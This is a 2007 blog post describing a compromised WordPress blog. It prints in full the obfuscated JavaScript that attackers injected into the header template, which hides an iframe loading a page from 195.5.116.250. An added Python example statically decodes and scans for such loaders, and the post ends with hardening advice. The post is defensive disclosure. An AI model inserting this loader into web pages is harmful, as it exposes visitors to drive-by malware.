WordPress 2.3 Security Vulnerability

Posted on December 9th, 2007 in Security, Web | No Comments »

I really hate when this happens, but it does, and it is somewhat of a regular thing when you manage as many websites as I do. Today I found that someone had hacked into my blog (this one) and added a bullshit script to my header template.

I am not sure exactly what this script does since I use Linux and Firefox 2, but when I checked out my site on my wife’s computer (Microsoft Windows Vista & IE7) a ton of crap started happening. My web browser froze, my anti-virus was alerting me of potential viruses, and a bunch of Windows errors popped up, including the BSOD (aren’t blue screens a thing of the past? LOL).

Anyway, I took several steps to ensure whatever or whoever got in was blocked; I notified my host to block the IP that was receiving whatever information that bullshit script was sending. Here is what I found:

<script>
var s='3C696672616D65207372633D22687474703A2F2F3139352E352E3131362E3235302F65782F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E';
var o='';
for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2); }
document.write(unescape(o));
</script>

The IP address is: 195.5.116.250
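To see what a loader like this writes into the page without ever executing it, here is an added Python example (mine, not code from the original post) that locates the hex-literal loader pattern in a template file and decodes the payload statically, then reports the iframe source it would inject. The sample template content is constructed and carries the same hex string quoted above; the loader regex is an assumption about this particular loader's shape, not a general malware signature.

```python
import pathlib
import re

# Constructed sample: a header template carrying the loader quoted in the post,
# with the hex string unwrapped onto a single line.
SAMPLE_HEADER = """<head><title>blog</title>
<script> var s='3C696672616D65207372633D22687474703A2F2F3139352E352E3131362E3235302F65782F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>
</head>"""

# Shape of this loader (assumption, not a general signature): a long hex literal,
# then String.fromCharCode(37) (the '%' sign) and unescape() a short distance later.
LOADER_RE = re.compile(
    r"""['"]([0-9A-Fa-f]{8,})['"].{0,400}?fromCharCode\(37\).{0,200}?unescape\(""",
    re.DOTALL,
)
IFRAME_SRC_RE = re.compile(r"""<iframe[^>]*?\bsrc=["']?([^"' >]+)""", re.IGNORECASE)


def decode_hex_loader(hex_string: str) -> str:
    """Do statically what the loader does at runtime: each hex pair becomes %XX and
    unescape() turns that into one character, i.e. the bytes decoded as Latin-1.
    A trailing odd nibble (which substr would leave dangling) is dropped."""
    even = hex_string[: len(hex_string) - (len(hex_string) % 2)]
    return bytes.fromhex(even).decode("latin-1")


def find_injected_iframes(template_text: str) -> list:
    """Return (decoded_markup, iframe_src_or_None) for each loader found in a template."""
    findings = []
    for match in LOADER_RE.finditer(template_text):
        decoded = decode_hex_loader(match.group(1))
        srcs = IFRAME_SRC_RE.findall(decoded)
        findings.append((decoded, srcs[0] if srcs else None))
    return findings


def scan_theme_dir(root: str) -> dict:
    """Walk a theme directory and map each .php file to the iframe sources its loaders inject."""
    hits = {}
    for path in pathlib.Path(root).rglob("*.php"):
        found = find_injected_iframes(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = [src for _, src in found]
    return hits


if __name__ == "__main__":
    for markup, src in find_injected_iframes(SAMPLE_HEADER):
        print("injected:", markup)
        print("contacts:", src)
```

Point scan_theme_dir at a theme directory to get every template file that carries such a loader together with the hosts the hidden iframes would contact, which is the list to hand to the host for blocking.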

After catching this I quickly changed my server passwords, verified that FTP was disabled and the ports were closed (along with all other unused ports), and chmod'd the world-writable and uploads directories to 755 (instead of 777). After I removed the script from the header I also did a full-blown search through every template file. Problem solved.

These kinds of things always happen, and my advice is to always check your HTML for any changes. It is also very important to change your passwords regularly and keep your FTP ports CLOSED; use only SSH or SFTP if you can. I have also added checking file permissions to my security checklist: every week or so I plan to run through my web files and verify no changes have been made.
